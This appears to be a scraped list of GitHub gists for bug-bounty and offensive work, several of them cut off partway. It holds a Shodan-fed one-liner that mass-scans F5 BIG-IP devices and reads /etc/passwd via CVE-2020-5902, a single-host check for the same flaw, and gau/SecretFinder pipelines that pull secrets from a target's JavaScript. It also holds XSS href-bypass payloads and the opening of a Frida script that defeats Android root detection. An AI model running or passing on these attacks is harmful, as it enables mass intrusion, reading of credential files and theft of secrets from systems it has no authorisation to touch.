@Mad-robot
Mad-robot / rce.sh
Last active January 7, 2024 01:54
Shodan Big Ip RCE
shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done
#sudo apt install curl
#sudo apt install python3-shodan
#shodan init YOUR_API_KEY
@ykoster
ykoster / cve-2020-5902-check.sh
Last active July 8, 2020 10:02
Bash one-liner to check if a device is vulnerable to CVE-2020-5902
curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \
grep -q Vulnerable && \
printf '\033[0;31mVulnerable\n' || \
printf '\033[0;32mNot Vulnerable\n'
@LuD1161
LuD1161 / shodan_api_query.py
Created July 4, 2020 12:54
Query Shodan API : Plain and Simple
# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
@m4ll0k
m4ll0k / fuzz.txt
Last active June 23, 2023 05:43
fuzz wordlist
undefined
undef
null
NULL
(null)
nil
NIL
true
false
True
@vsec7
vsec7 / BurpSuiteSSLPassTrough.json
Created June 25, 2020 11:43
Filter out the noise
{
"proxy":{
"ssl_pass_through":{
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":".*\\.google\\.com",
"protocol":"any"
},
# replace $mytarget with your target
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli'
# use the -r option to extract anything
gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli -r "$anything"'
.php
.html
.txt
.htm
.aspx
.asp
.js
.css
.pgsql.txt
.mysql.txt
@gh0sh
gh0sh / gf-and-gau-automate.sh
Last active November 30, 2022 10:02
Simple script to look for juicy endpoints with gf and gau
#!/usr/bin/env bash
#
# Requirements
# - Golang (for complete bug bounty tools, clone this https://github.com/x1mdev/ReconPi)
# - gau (go get -u github.com/lc/gau)
# - gf (go get -u github.com/tomnomnom/gf)
# - Gf-Patterns (https://github.com/1ndianl33t/Gf-Patterns) - Read the README.md for how to copy json file to ~/.gf/
cd ~/.gf
ls *.json > ~/patterns
@hackerscrolls
hackerscrolls / href_bypass.html
Last active February 17, 2024 16:48
XSS payloads for href
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
@rootsec1
rootsec1 / fridascript.js
Last active March 25, 2024 07:26
Bypass SSL certificate pinning and evade root detection on Android (Frida script)
Java.perform(function () {
console.log("\nRoot detection bypass with Frida");
var CommonUtils = Java.use("io.fabric.sdk.android.services.common.CommonUtils");
console.log("\nHijacking isRooted function in CommonUtils class");
CommonUtils.isRooted.implementation = function () {
console.log("\nInside the isRooted function");
return false;
};
console.log("\nRoot detection bypassed");
console.log("\n");